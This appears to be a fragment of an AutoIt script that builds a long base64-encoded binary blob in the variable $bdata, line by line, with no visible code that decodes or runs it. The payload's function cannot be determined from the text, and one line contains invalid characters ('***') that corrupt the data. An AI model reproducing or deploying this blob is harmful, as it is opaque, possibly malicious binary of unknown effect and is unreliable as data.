	$bdata &= "vVEsFYjsF4vGK8ED9sOlH/aSRFJeMwP47MNIA5REnDwpbuhF1OIKWjIsD45B+LeHBya3Il8KwF7B4BBbC8IFi5i4O39OwxAwFv6D4B+D+BNWg3RaJLxy+Bx1A+L2wy8YfqwPAo7TdJ7DJf/3gAYuw6zAmRxFu6YXXsIM5FQC+uHYDDfO0AEWcgzIKZQCjjeTvCgEdAsB3uGqwr6hKUYMFR/3oi6sAzyAkeODwvAd5uoAQEJQ8BomAgZQANrZ2uJQielICOdQDHiAtvAB1YPjcQ1gBgTaZqsFOBpv7kh1El0wDA+E8kRt16Hb1PNHqaV0SwyAFG4QPCc4fhFqBr1IrfSwx96sXplqBZJjd4shTQqLdz8Ptt+Cf+t/g8P/g/vsh3/M/ySdumA4u283aBCDi18saDTrXWoWXhCZzX4AjTDrTjsPKzA3x9o7OFkOMHc0LOshu29WaQ4wGS0FHOsDNnnjCPjBBagQdHQktBxPonxT9F4Nr/Tst"
	$bdata &= "Fzc8EayqPw2uJbTFoErh39qK7lPznF4qBM3jy94OQ54YKKnEkgGnuy9nKgIc15tnaDMLuEoaTiWqAM7ErSoVm/rBLmr0/vWqAF7OhSXx9tp+3nXzSBQX6ZnxzuLgwMLu3oKqJLo4OA1NJfvdlNbdxAmgPp80yVuwDj4uAHCX9d1q2PhISwQgTD3w6BqUGxNdEF+SAQcLlY8z8gggATC6wKLBB8mENFQQ8ihuE1HY1LByB2dhWeSbiBQFzwUrkvh1kb9IRo5jC6TJh4fxNm3kf+NSTwxx5ZnewZtDl+pTwdegxy4iYSfupgYwMMyISyqQFL4wmjcPOACs+zi6uv1qSMZUCXkBgyA1ZJm0CzXjkcAlaRVT9ieFbFC9oSvUyMbz7Ww45/tHQd/qHlTII4st0cOskTjdv1vDvAPr3cEg8Yfwf4e5vwYlQDDDlhmPR4Wv056NIrHQFcKgRCN/wvj/k4oO8EPguYkZQOfpzPtVYnY+IIDEgkj2n"
	$bdata &= "/hZQxmg38OGFSJZmbjzWVqNNg73XUnb6BoD8RpVpysg610QLEo2Vcc8DttzsJVVfPScxQtU1DzhXB55DD4iHQai0SQ9gdgElaDx2xQ17QRx8BTmdxXL5vqLUX84GlYUICF9Yo79ayuVo5GwZVDM8cHobEKNx8Mf0v8AMaD+ANTMSx1Y4P/CHVseQmjXgJ5YIJD4u78UJs8yYFYHJe8OQ9LBRxMC5RtUCNxwAYO9les0rgVugpTKtOKYTIHrf4B91pBj4uJDzYPhaB5xzzVtatQIpYQCCISUkncM+GCaq4O++g/+BNui9eB4soA99ob0mgPH/EJ/+SD4gWDwgWsUo0nFPDWtwtwUFMQKOgEQ4ItQoetEFF/aoCn8en3x2Ebaiac3qN9eBbVYRE07cCJTlhWW6PxlfA4dX+8DTvwhtC8T0L2dW2OArsB37uPJbsDDCIBGQQz5IQWN5NP+C1hKiMHz8f4EnDBErBADLNRspXcoFxjzxBiERL"
	$bdata &= "je3+ONwEjcvaLfghXWHI4jOcCzQxXICcSzbww2BRfIhQwtDE+notRPP5Jpmhxq9O2BJ0XMrFHXsMfHAxWrhM6PwqxNMiRODJJXxwcxkP8O9+fxzSDGLjfAMoadPGGw1BQLX4EDH8OozXZWyvXVXUzi27tHwVsWt1+UHytAAP/AldDDBgYIQx9h7EOEZxdX4leCDftC+N1iNl/MQwID47G2AuMHrXDRgSAA8ACjLXtP8iJjRSKV1J1b80nQB5wxzwBO99820FsKlz7O3U2hphIQb9PkjEYbw93+1FXcYwlI8/DgIlSsPwaEziDxCRTwLwoIl9kjDPQA63QtqyKFxFGNE1zWFGE4AoICAxEbBUOFPgQoEgQr0CbZGtMFs3fOQBpWgOAdSgIChIEuoaapgwMBn0egJcajl830xh6ED4AsgV8+aCF9KVVXgA2gVZBmRDmc72BalAE31IfE8EUqhwkMIQEtAZoIqXEqayTQovtUl9SCe6FKxwY"
	$bdata &= "YxAdCDqDmhxBGwDw34I92tR/KFIJiSimL6l0kyQk7P8/wihHBbAAv1WNbCT+7FRJ/AIZ5NBE+Yl9NN5e32AoXwgPhChcEBAPhR/Mwr1wM4l3EFU1wgfiiUWghWzmLIAR7q2NTSQ/ml38aSPcIjkkNoQMSzfbqJC5TwjU+GoYUSBQov+ZaiyNVcRTv8Jr2yMF3spTUyhAUrzIDtD+rn1FxFBTxwgo8U3MZol10GYc0pWYCM1OxNQZ8FBN6J3gr7CKouyLYoCMM28MQLFIUlPG+jeh3uDsAGacR6NsAPVaprXWBPDbLBiUTARIQsg+W+gWt/Kkqo2Dg1dITHhIUkUukd4bsMZF/AJ4u1wo34hO8MN1DYi+V81IacWLVUhwAjho4ihkTdSwdlJg/jBQyCxQWmCt4C9qQHR8O8t0eDI8VEygqEvjnlU2HPYPteF/Xjt1PHNQD7ZMHIosZgYCVLtLwMHhFDtNXHhETdsVbNZNOAhEbYesiERQu"
	$bdata &= "/u2/cHpEIgMFlJFRR5QiEQOARQuFKEi8O4WArHGBOurjNYMCWxb6x2lTiCWMC0CthwnqmmGKjAFIbDHk1RM2uEKB79zJiRIluHhQkguUnc4GBVu8UCJRwi6pHUn4IEJg4PFVIgJ35ACWGMEIy7QPwbkKyijAE9i8lTk8bu6DSfj3iv6hcn+h9pABCbdYzCLE4tL0WbA11zKLSg7U1RrXVCa3U7KK80qIrTkg4CB0IF9njQO02pUqP78yahIBI4lVI7JJBj4pDSc+NnczAy4DF+vOerXvotUdTc77HUx2ATidgRo6F21xg4bNEUTrYcYcnSEldx5e2JsLmFdzFYwYWZwu6Y4C2c4UmgncKuBJJ9QZxxNowirCT1eCCj1OhBokBdLx1Jaw3xzQAREAC7U+h4MJFEdR3tOeMu7Yj9HpQETTlh+RCpiNWEL8Jn3KAosnVluqUZauwjFS0LU36KEnoHIU78B7gHyC9zHATc/Gs2GWlAHFVnDCj"
	$bdata &= "kUGl9rzPlBlNDfZmZmBkhaQk8R379RQoO2Z98HRQ8Cno1O8gbq7IMQrgaxrM52iosQwoVYZKCd0oNMsAHJDJkbif8yY0QP6b65QXiGXul8HmV6GEZVZkzHRKKfTA+N/q/iMJU6lNo79R7uF4reAhbSUzhItMSKz6HacthXIgouFSg6ev/APOmVkJzsjQSYiQ4HPMq1O16IkMaV/wFuWGE0HnT6y+sILqBXGHcPhYciGjPSA/fcczCagOPLcgQmc0lbHSI8SXy9ezSeIMZbVLA8PG7/xLvoxYrhiSDRweoQGtLB4BrpKQFqPggS7oapIngYJHQKDdSR/gYA/wk4UPIkCztZCd+TZexwj0syzvEcABy4gbTNlBcTvwtkiHC7AHVQDgY2/9mJXegz9jlz9gIr+XbZ/YP4AQ+M6hYosoXhERBDtH+n2DR1A4l1DILQEYTBilsszFaNS7JDGClCawUwNcS4QOAE7GjKITezVol1uA7I2B5oHm+"
	$bdata &= "oDEwc7HVyC+0VFNSLfdD2vJoI36727bBczFC0TaSJReCETXf9U1MIVpr/ddSyV1GwMhFOTDRLpOtBaN3fVSbcdkMIUY1V5FLZUfTkIryjRQdWDtgACShgsvZxTtbkKHZZm2ALXvw5ZnTaCO6CAVD0qg4R1PB9CIt1QkW6DkOD+jsuqGgvyLUHBjqATcSL2BBdAAQ4E4KOUtIO/OW4pMQkn4lN7L6JotvsUQboiXjKWNZtfJXmAgiuHc4cZkyzT9CpDuRFrHCOeFYiSRCeVRAWCK9K7OYrTpoIggmhezvj6FCZMBTuDO30zMcrjnWsgGYFvdVt2W/frlawpdV6eNvDbrUV1M4MmG9l+95VmkhYUGZlRite3taGCUxWGlldCB6HHWD3YBhB7GxeOC9Ehu1qUm2aHEBvf7R2FUQmIRgq2OzMKOw+KhdxEsNKQKMpHk/FmOAMonoUSvt2VxZ0Ey7sycJj0WgqVT5grDCiEQokPaRAYWKAUkFg"
	$bdata &= "Yu4cjYa7iEpRxwNf4dSx8KgirN4IAfg0BtL7C3+JFxF0LP9QNIN6XqgQUMrUU4jOjDrtUehGiesJogH8MBQMRilRa8NgDQLQXE4IXpReqmIEIPe1BFxCaH+EUwMNfgUHXgjeOWgImETOLVJeUBYTUA4kUmBcg01BTTJpXgmQ5pAYQHjmIXgRiF8QiVaZgVSgQKIgB7SRBncsQbufdwkCDb68LG8sfu0jaa1lqjx8djscfdjgF+Bxi0fwDBgDw4kO7poCGfRwVLygpgRsmlvMugwQVuoEB74dfv+oNx7cibI7c8O7S3jhzB54g8MUquDCUet8oTcImwiFLukIZdBKXkAfbAxUCKWmPEcfAw0L5GzsPkgC4lc8g0JHCCsHi+mq1IW/CtR+ZotPDCtPan41Q98DbGTMKxb2TwENkJnYLN62RQqvpCcUUVly0dd6XHhzCoJkgeLWIgDNpKgcaKuIh5+YrAx1HXJkDhyO9P5cqrNSx+Frb+JIX"
	$bdata &= "HpQkuol2tfOHSg9CWCMZF5YUmF3Beuxh2ioQmBH9kGDASxRIWnsTtILPmKmBlOLXnjYg/sBMw6caLwQkIN87fKadgqLVxJXwshEXIH/SZZ2W4Ng+NAr0YP6AVbrMPB1Ljvavm+iL3APxqh4Ib5DRHiAb6k5oHn2Ox4PjninfZr2/l8UH207wQ5lAK3ADsiUAs0aV67WwF/9bIPgAeXBlttBYeArxTsyjesGFtEImD0qaEECKgZrTfGkCsNkSHyI0Cai4LvjbOsU0ysXYGyLOOvg+6yGjIKN/0cE4I3lIdgaGxkMKopSmFg9TCWQghx+J9Tv3ra+ft08ixaNHAj2Focv3FlqkLY4fB8CQr1AJChWNjB0KQ2AF/yL6yvoK8p8fgYD6gRT6nHFhg5JDDkyAAoTz4b7K8gDylV5e0E774Qx1jywwqYr+Tv4dnCODsLB/ARg4p3ZW5p+Ehw8OC3rBDFIfd7EPnN6YFAHHR7eTSBS2YnDwIxQJX"
	$bdata &= "iPMO5AbBgKCJQ4nmb9JAFbZyCvWNo7v7soJJpMyERYfE8NdJPUhLwF+XAmdO2w4x4vSwwDlitLv4+gGA5/2DacA2dsnQ4utdpDnkY+SBaQbBQPrre6NBx4igQGuAIeD2IFLOGywdRaVbxXuFa+AztPCE5wYk6hNNHI20JOFkJzMnfgBsICo/yfTGupAfZ0dB8SdBnyD75NYBK+CusNDwcVY1rA46T87IjT+AzRxUzD/nQAYO9VpWRgGzMVi84QzygTxHJMpGg1XFjUhXRzcHCILjYBUVMSTNdz7CucFJuEfMpyRgiaGhSOK9bkGn64U31wumlT0XVaeLwD0VLh1etLsQLMtci4i4d7yBl9IH4pmCVI8TPX/4B5BUiDyP5Ai9GKHUqDyv5C4FyCwCqaRFUY2jVwdnBkbAwBfJnvBnhiNcGLDusJkh2zrxgT6ChRIt0X4MMIeCZQ5HXC9eDQ4pmFAotDOLKCoyKTDhDC42oaGQJGZeEATyB"
	$bdata &= "sdHjpjRRMEHR4OsEI1pZCJxhXOXogdBwkbDzr0wEcRkiERDxQibojhZkWRssWqobyHCdqHNI0XdON5ViknipP0zj9Xgs0ARQI3RcDz+tw0uDE/1FeMHgz6HQHJVghcBHcyfeDwEzNUudzIi1hhyDkCOQM3oN38t+jNOXIMOl3GLI+19Erohnk5Dm0LCg0KARMUjk0LBMdVBjQpEOkwsqgA9zBN3tesRSlE9ESAkvwHJg4ygNe6D54eJ4gdAPTr3BQqzyD59FceAv6OHCHjU7eh+nyMHOLfCR4qaUA3fENEJjDMb90391sOJxWE6qu7a6CgTTYTBcwPqRkQDDYA05tSHBQ1A3hQQpu+OlXCLE83SvwFFxcJIkUKFIZDITnw+FEDWHTQ1hrBDBS4zEy49XlBvKGYu6+O+7M4I8U3Rcs++RdO7hPLKjBzXS8KO2GT+U0bEhRwSzFQ6bGi6pDCNzJjQ1v0drNOcOwTIZOGyZ1YQyDAMNFkYss"
	$bdata &= "cxeYobXAW9LBZUCYf5EIkYMIbjiieAo2fINoydePfYQiBJksSkxhgHdQQjyNOkTPigGFnvt2eljUSuNAUHcGDjmVf7tYVjdlWkU/sNVgkM6CkPMqTwOGDOoIHDNAnsCV35VC+DU2vxMDsr533yQc5TIRiwJqAYJ1Lg3SbHXTOzXYDBynQLpIFC8Yw42SV0q/u4hSskchu3z87lcEUrer/5HfVZipdPuNrCT8/VCB7ASI27gEfHEKe8WJhQpcEmgm0EGD3EHGV/gfWJDgJmSlqI1rGkhwJ82BxcHYA3+WVKwS3It16COggXhmcGjjCK/UrUzO7v/SM9AIeHi1bXLhGbhuDDAJDGyM/GBXwi+IC4yWHT1Q6OTlVfBSFMLnLMDTB8F4UnoAcLKf7FAPypdN0GJ+js2DgTocvwyAfh4l04U83/CLdJNOSxfKfMycFnZZLnSsj6hIMxz4MlTA9XFMXREcVA4l0IwPnPJIGPOxA87AImt0D4SUm"
	$bdata &= "2Y88qxsaFBS4zRzD0CBSYuaPkUHHKRUBTUIhO3a1VCNX1yag/vVdLSahvQPDOpg1iOcFwXyBw6DA0QYBZ5sdQmVCwyaoGgpCdT8kGCLRgZyEJ2HTj9mbIEdONQ1NuJKXGgrDlv1hQQoaFSH+CTPEKLrrVJPxh5eNOAB8Qcpi4QkgGl88IR7GdU/dFFSK9UsffBlMXbsKAPJtAvAyCg0nETuEQFvzAG3LGHk6+uIxjplhhiAFkMQmeif6xUOZ1Y4lOFEPhgKMxmGSCDRXhUa4NscP3480N63QD7HBuVLBCchLQHrEBRNI+D/CAJfP0N4BaN08MWkVqulVk+XDrA8BFByKmkYBtY5kGIQvrALQjVguxCL+JeyQ+y/OoncEKUfO31JSFdPgbwC0jQBMBQE7ZIOEqw9gxUBa5KDXVZyCM8M8eTbL6CR+uiD+AJ1Mo2BDADMejs5dBICyGv8kt4sH3zxX61foY5yJjoTVj9eGCArly4/+9arQ8"
	$bdata &= "d+NEReARn1Bg+OTVU5jZC/+dkLfiEq+h53DYtJpoSBNOccqiC4R4LIC38h8Is4FPXBbMiyDtBJMwQt7nFcwAc9Xk1T9UVGYGCOYts7+3QhQ19pIXZ2HETPiwHFwE6q4gm+QAhK+fRC+Aaf6gF16Vc5TvA1ryEVXgQMECa8C5YSQoVEFIA8EkINn//FGhisl24EK043R8IdwFN1Mv79740cCRksi60rDbMDaxD9m3hzA2uBIBqIfyt+DqEK9/gPjrVmANDNN7VIeIFVUPFjuik7QAPDqGBEafDkQcc7wyyFQVUdrEti32qWHQk/rNhVU+nAYHiwDpyXdsuPBIXa20YEUMcKHpZMok4931wuEgbffkc+Em+sg4waqhS5HkoVzmZkEgSALgBXjLgBCTzHIqCeCMJ/Skfg5CP0BgyQw/4d6KnJDJBb2EE9IBZrcIGMBJ/AT2Jj6C1DtMK2gXcDTFrKhTwzMYGWwCrf0wzZfAYt2RQ/4/8/mAg"
	$bdata &= "RB9YJ2CbD/0Im2uaYgzx/qAl8CbmoX7jkInnE3wy4hVwkZyE/hgw8JMEqhL+GFived4kHTPdxdIKAerC0JXUsmgz4Uss0kSB0//SEvhTED3UPtVagzxAaMwwUi3YI3GUvIONeW7YNfyqwMhtM/wa02g3ZFvdW1fY5t6d+K76d/ltg8Dc7G30vi4eIhwwNFFCGsC/QcOguEp05fNcEio2PhBZnIZfxDV/juW8HuF2RRYHBOc+E3N20a+Bo3y1b5CnAJ4acIZJTYNTs0o3h2SzWQioAhf8B3LQAmnU6lhhqEOE3B7vGFFHEu04Yi9GDwL5JDKC24uBaRBDweBcrQHUSPjb5FNaCQkaIKFiaXhvEfe0IUzYUzHZ83gjjGIzgHITvfgiDRgwBJXiWuCVcLR9sviADhfQKXRxoQPsJUs5o0F9xBuSqoD/g3ABrGGGkRD/CBHU0NHYadT2LGxA9iB37LYf/gQiohMbGtB+gxnkDF3iEiwYDANAD"
	$bdata &= "AI8g1SjGBOPAo904fODyjEyn8UF8xGhU/IwkzGp9sQEd0yx1fJQknNPAbw3YSWopfuWehlR+Ge+UjV4NjqEGsK8P5Kpn77SNQLDgUC9VjX4gTirvvc9DxvQ2Uc8M7r3zTc44AcA8Dg5OS3oP0k0MhjAqUGVsHsT8f/txRwf01gWW/9QGiYYz0rwxBBItOC40I81IPBVAA0RLM9KMAkgUTJeww2kOUM1IQGJL+4PtagQmja71M4lFAExcVGvoT1AUAY2+xB5q4mvIKMgPhAo9Hkj/Uv5VaLUE2VLPOuwVVIyDdjhsN1dot7mkIydVBwGTAHyrgRAyaLI4UFDPyViI9A65SdEQYggaBghAggSGYlmNwG7bQh1os6FqWxaUy8gUUEiLDIX0Eg9VWgtLYsUah7Zr2igeW+R9wlwiZw5gFVMdsVIVC8uwUG3P0r6DvYQQH2NvhMONoz2BB5NBLlJq2oXu88dHhAeoDH3joQasIAyd2Mh637FwD"
	$bdata &= "1dOHFIRGDvpXVUM4YlPhKY/lCCLBwauJBy6B98QmsAlZ0V53F83TdHi3Mf7gYuGX6/1ErZOQJaQ+ywijBGo2omKNNIgJE4waCgsrIVJTVB0izpnt0vBQKIONcca441hiiEy7PrZMkMMN+AisM6BX7wYv7uOIbEmbMMWykFgzaT1DOmHEAsYiQmEhUbFNBoY37GSxzFtM74SEZ90I/8UqgMKfkb5d3XX1DiGVnbjJKxUgEyUTLAu9IX2CGoB+xo2hGgJGR9VDaFkSAvgkp6A4ijYPxLL0APOx3RFOATBBPvbtTPAYMfAKLlq8H80DCCHi8bMP35cFTJ4MkqL/yZKpTg/PwxOh6VujU4YQVY8v5Cq47Il346B8LyJnLmsAd4xxEJdUhlSQp7vlbuNSuEUJ1R06SBR8cE7U18kzDPS9J3CXkkbGo5XYjhfEU440GyMRMLET0SHdQCFgPLo0rp/wUaFoYHcqEhVV6WuH9BWUy8sUAM0ZqCaaD"
	$bdata &= "KtEB4QD++0iz9qMlFF0AST9fA1ulLgLQcLPy1WI7sEY0kajMAVSYsKBc44n7mtIRtZvMED8UlLLhQuDUgJBV5AvUYIBD5VBLq2z5uFnGocE4BMBC3bUuh7YGokHAJW8CngRll86wJZs5EWQJL2BGiuhkIe/RLiJAHmBLX8ZRQAsGRAFE4wSjafvPabi349DC8JAMsLEFiMWxh1fdxXyxx08JQc9hh5CAgVW0biWREpNVDpvwJOCi2M/oRHJzU4WWDwoVYVMBHPpyC84SRIshYu/ECP4HrBKD0hvJccXTW9lok4x+nIzvVTV4+fi9ij+7HJwh2mg39S2mAONaZW9Kn0U6oszM6tdwSnMPElr4DA371Xo7V0CKcglALCTOYsA4/OKk2my1s/FGCmV8ivw0I7yxg5Elrh9RYBLAR0MzpevqRS+T4cHBwcO8uurndJb3XUjW6gzUGQ9iDvNDwLiV40IjgWJKSZODxovphkjy4NjK4WLwF1SB/"
	$bdata &= "BnYmeMwrHhpxKxhASZ1WlV9JxazlYDUwu1NMO0bZEESQNi4YMEr6xhBIDUQtETcBhYw8s1A10jhBHAhW57eSKKGQZiwdsGEiIXAcgsJCH2GzRQGBJLOVw1eGoXhpyV3QPMAO4snXYp+OkBIIj+AdwglCCehjxvqOd4Gj1e/wuZTKtrAoHQBfoXEX1LL1YIMGPREdUOHNj2NCTUqyBS8gVbt6UGFanUVQFmlL2U+gdjMDCX689ghsF55IASauag9lC7CCXTgazXFuB9lGXhGceJB9pv5FMkpz1JLBAHhQS648g9cHmBgMG/IX3x9MSDiD/jV82y5GZ+pjzAWxMmYyfljHBXyANxlidiU+YnAzqXv2hVaYBGMxDE3z8xsK5ogLY3IplBzsWttM+vHXvNYvHm3CWCN9fHBSxBeUAKB+VnDRNB3Q2In4EFBhMxnKpHCCeg1+vuffA2gHcxm6FDgKhv3CDPN2/CAIH84g9IDQ5QFRfpVYC5AOg"
	$bdata &= "lpQCvIX8I+vxpQtpCK9ea+6MXF8lTgRnzKBUclDgN18IkEEOhn8JFBwD65B2EKSKBLelYIYMiUEQhsGJCzgGed8cgGLIDWyCgxPBNeENfAa5OY4E3E6dCR9OZwhqMsSBiiUElgRSIzU1HAKUBCStAK7WNzSNRjhq/9MYTDbC6N+/vZaCSSYKGxgUCwpX8kaND99w0m5B53tKwA9yExm7H5hJwPYfByv377qUCUwEx+jcDLYRB3sgIwTbKxMS8rX2GA0o+YDAv74FDyjxQYNqCsKp4W4MoESOSDPtgFMQeKhJhdwDHlD5FyRcURQLPxj8HLMDaGTUViiJbjR7YQWw32wKVs+XzA3BGj5qJPA4PidEZ9eTGEahBB+vrEztdztKPGocl3AcVwWu7Q5Cd8hQroaYH2CIhHh7bFWJeQV4MA7JNaBAmVjdQ0aeEjA+7eNuDEYEHQYsD7YrsMN2l25EBGSugEVN4K8Dr/g7/XRJojOq63/QLZS8D"
	$bdata &= "4Rg5bUqlnwUOW6GdCV3oen79CFVVWvoqHy8AW8wAOx3BTQEOgn/0WKwMNqXM5I81pxh/DE1ELHD/74rX+QqgnMIIugcrGGpT55AaGZbwwBARIhrHAR57g9hmOyjWcwIxwEzeE+GLcx/JpiSXGMB+Zc0DQJAKCAoWAPbEwZKbxiU0wD4Ehl0HnDoCn7ADWPrc2owg6XDGOYUfYhXribExZDhGLBI9lhfgB4VAFkKzFbw3M7LfZ93QQzN7cjC2iWv6RACU6ixkaXTWFSHnjhADCHCSDIg4NaB8QQYZRCyjUA1kFA2iVikFWwyLypkaBMOgoloHGxD6C2YGm74XSMEz9KWGGCYtYGBXsL6XOHCgfRNMeCXcCCdTKnanRh04DQptinorKYfxu+tDwqTlzySBD/UG7AJMKBb4IsWnVKzHeDbDkeJaOPs3grbAgQGUDBkhqpKMPhCD4Wi6Ii8AWVz8HhKDXkBWEnIQ1D7aCCubAcM9Hss6r8IsV"
	$bdata &= "hvt9mcIo54LPE4GhH0UXDZbUB/C+gJnTC7QMBLv/RTyLwwV7YA3CHelDxogkjhifh2XFEL7nvBYJRh3FPSOUjSvXaYWgBfTxyBB6aYHTh4iATIub8NbAoggXw/mCwesJoZkAQAZrR9Y0g0PWgYvU41gA9PHXT8Bw45p1J1NkECLRNYjwRf2d7YDW+R7H2eQJe2rgy8JP1/ZeBW8LIg+UgFqrCdeXftp1pT0dj6DDOq1cART9hBEBwIPm/iFImenLs9pBna0ngiPkNUPbAepFJ14VuFxPKgsAPpScwcK5wa41EzVNjCCmkUmhQBtcwAXtTSVuzAXBYuS43GSkz1CXlQiCONoeQF/76Q+XPkNIxD2JKhrS/j6FVTjxaFHSx6Pe2tKb3YGX5DT+xQrCe+ugv6vrmCZ27jDPwyvkjHLvNMYZ+QOD4E2goAgbCWFh7qO0r+aSvpLJy7R13XolLww7wlsb0AuL3JGqTZgvIwHBGHhQQxm4SqjaH"
	$bdata &= "HePQKEMZmAL6HOMUioYE42FH4EE1W8LbQ83UhY1NdAr7As3CgXERhBng9hgkplowOEYa308B9CPNAq2sFAUsEY3IonxH4994b9tooZEyqrW5NaBlcMMhuWFC7CYek2wwuoMHuNCU06wkZaoDXa1gseRLglNJQ7gVIBCjek9ChJUZ99qRjBKCDkRVE+2GHW71YEYkQFet1NiQBlrpG5E4KlAKONAbi4ivjxS8y8SsIiQ4WogibBDyPMZa8FjskxJIY9vwUgQZ7p3Z1KVpwGwjXwGloJJ3eOyv6gjdQ2ovCwSDB6Ag62KKIrC7E9n8Sist3AorIOsp2ECJ2BooQ6wo0u2bpLmqIYiY+cpdL5blzcxEREddfhO4PtnwJdLAsPo1NAWnJ+/7dfru4gYAA9+kD0YpMOsH6COboHwPCOOH3lxADE3UMxoAAsapv69/0yKO0+CvPPH92Cb3+/KqBoOnuK++qadKdxXBVVGeTA179476p2raAHov4"
	$bdata &= "2tNQEGvAKtH/KIET6jf5Xow5ll2IGJkzLyAKBgEZFCiW2YPmo+sw3ioYihwy/9v97xJ1CzAYKsiAwVXrFRQqHIDpVoD5/4r7DrYHaHYDMAFfDhwaDV4Q4QAH7RmIQBqSG32iECbJ3ck3N1F4+ZgM2NHZ9sTtzP+2QdjcJShQ6xHZ7tjZJQ7c777O3E9Q2VxX3RoNuGI5XlH4vR8kCAYE2cBG3st32E0UxvHewVnD2VvC3jZysNjaEcjd2GM/2kBG/puo2NIhkuQM+ezRn93agIUEFYPADV/i/GTuQQvFJAWUiQTwBwAvULsbtsM/3MyK6DgO0CHSFNZ5XH8ynwrvp+/B6T7RIhcICs7hu9soHtwNDSuK2IwvhwTc+W/XkMLsNQRL2PESFHl2uDwICMMN0AiC/3cPehAcgw3I2MHYyusS1oQUPnAj4sLZwtP7y7D9HCTZwdwsBCSrle7d6oV0Dhc+RHov2bI0j9jbgw0pKd7JD2wG21yj5"
	$bdata &= "3g2ikTQYh4UeFQ+O9mms2q0CPAQ3MA5eBsplbF22RQOXt3ozKPczQZCCo5B6Rjlu8fzuhgY6BZ/EEyOYosGh1SN2EgaIyWjnmEjGHj1qQwM0dWdfQyKFxSIOOoV8A0nCc8WFy1d4SxiSp8uRghX93lS2JsN4Mcc3B0a4ES3+tiL2L8At/syyRkCseAiVG/2WFbe4akEgqSEzxhQdDV739L/IKJsik4EilZIHNQe5APfN8IdNFnsC8xFGAQPIQA8z8SerWkUFhW/hSPyFPMETCQiD6/T3gACNM86Mkoi7Lnmvk/7KNc/Dss55aYZMCBSbNBEJCHBozHyxwPQITRRFwUPr1b/RGkeVCTRHw/mUcKIQQROpz9c71PsiFEFJQXZWQjrAuibnCnY6NhIs2h6BhsyFXAoXiqldwqB/4MN9BPVt6r/s/RfU4zxtYhW16gs6P8/kR7jAPAEDjQOTtYG4l4IBnQhMgSh9YeHDhxC6APauWwVBFEk10"
	$bdata &= "07EGqaOgQYHGJFhBE0H3+jZGO/vrjji0YUBqLSQwsUCYUqJv7UA6hM0fCGIFCqWBBLzyPwX0dyMQGETWgQBCu0xi4IPeEdi4EmAQ0YaiBWLfuJLzBWdQ1ZXncZIwXnhEEfnxPIbGDlAuIIeniYw6qWVmuxV8dSdC0MNLLwGEEECLeKaD9Xr9eObXYIYQ9XzV+Zan9AXKECDkYcujz34g+QwcHggfj32QvIUdVg+J7BKL2pWDbCV03xsu+bV3S6x0a3mRw0AYC4YYJfOVGC0nUDiv9mukiDQRh2BjtBHH3xiwSCw98PLYKcVleJlPXh0suDhJPsN1Njntniyw5kDlRXyhVEFA9u8WE6x/oAFiQCaRSoQIRfPZmQQAqfhsskDBIJU2QlgF+8PqSB7CgCn1fEXV4kAjQOdaFCCoMMIwCKMcVK7mcSdCtoR1QGOBnxLBEQsI6cg2HuSTlA+M4EnCA6if/BG489pklzdO1Vi6xBeIDcJDyB4d4"
	$bdata &= "yC1fQLHQzap2DNLloRtJG66pJOJsEXDACPwwYjFtfhSQSbnhTiBgDx0PBH9lXFUsEb4Prw//y4NtKDC+FKQ6CweAjYlwgLhQbCZyCuFYYwHzcHgxQRQUQNF7DPsNiDSwwf0hI3AyhNRuK0knfwIG1CEOgaBOB0InVDzrBEKVoYeAEdTPU1xWX4uKKG8Ul9H50lWSppAsdriF48ZTc/9Z9sIR2rgndBP1XwBtAX0kEC5liTwk0Pwh8BkYpPzFPFQQyQ6gRHXXZQbDvuGS/GySvgH+oPhghE0m8qsD7cRMfTHUdCQ/NbgLPKEQOrCz8eARakhAswwJ8ZLgUS1++dakX/DZhP4M4tjtXaiBmZxLgd1N0HnUAxdY4Au3fqFxmszTBpqvqF4l4WCwjpwQZlwe9JVgDZSCq1m5P/apMYnk7rJDDsD+sfHHRJFT+ILYQoblOpEz1IK0TOwwIScdQqawoDOQgO4l/vvzQAKdJxLvMGlZ52AAG1ron"
	$bdata &= "aMgIHwH3UmrgDGiI/Akg6kQjTwH1d7S1FqUTSbhqZBtl21NKiKLgAAFXglpwhBwF8pUL9l7c6yxTAQ2LVhxSkKAF8DncY4wvzMJ5O/EezH1ezDA53ACfV+HMEIo4EI/EB8KISQfXlJkYaEMYVlJt2s1/IAQcEF8xDkBeE7+/RswFvAUSE9KuEHcMQfLyxiQSBCliHUZiI5A8pxQD5G8DI7+wHBKFwIG/eF9CIM8ighReASwQ3oX***54LhIHFF294qAksSNTFRBWSR25ksQU8gJqh1PyAsKjF3ygx5lZqRBIy3BGLqx3v2ZmEmJ87jP2OnLM/AYfArIPhIXvO4tv9DvuWFDdWkQYd5+J7/9q8hw4DD6NBD51OoB8LnUluge5J4MCbDfFC9BlASy+kQtuVYvLO24gg/vAgk/4cogIbk502iv3xIbfh+r1fKmVdBRMfB41Kr+SWGj4fxeJaCpz6iIxgXkIgRZYaGJRQUs0GlgI3FP6Jt7As"
	$bdata &= "ITdRBFkIl+53XYBi8kUYBVyEwk18kMce+5xUSQ9Bot8/59mA6cLzwHhRwAmeceNUML2USYSa+v0UFf2a2FFq7gUq92GFfJOv7/5QRWJoxX0/8XIDAWKSsyAAg0s8LosQVwkPNMHAgWPil/AKJ+PBHMHQzSYQFjOQDkQF5Y4qIDQ4DSlTElHmILEZUZq47PUGMJqDUH0jRm3yzh00gx3zTifTiJ+rNH5uxSynKEwfVvR8IPrARgAH1CGX4Q7q41HAtRmgzgKdQYgLlSBcBct9ORxSlg/wH70isKjM9sAXyDwCUIhnijhatbWQNiAxxQko6eHXsCzrAFQ8fzhmUvEQAEXGDRYsYhLPVmIDXhT9qCL1b2BEZH7pIYTwIhFYMJfDTxPsHZKqBB1Rmo4C4/uKakcO8PFA6SWCGrrGGyMmItzCl2wzh9xfEe4Ep9CvtjzIhaLAsC74ZFrgvCJbO/wh+QdRClNhe23PWpfai4gyTsFp7HcGFwotJ"
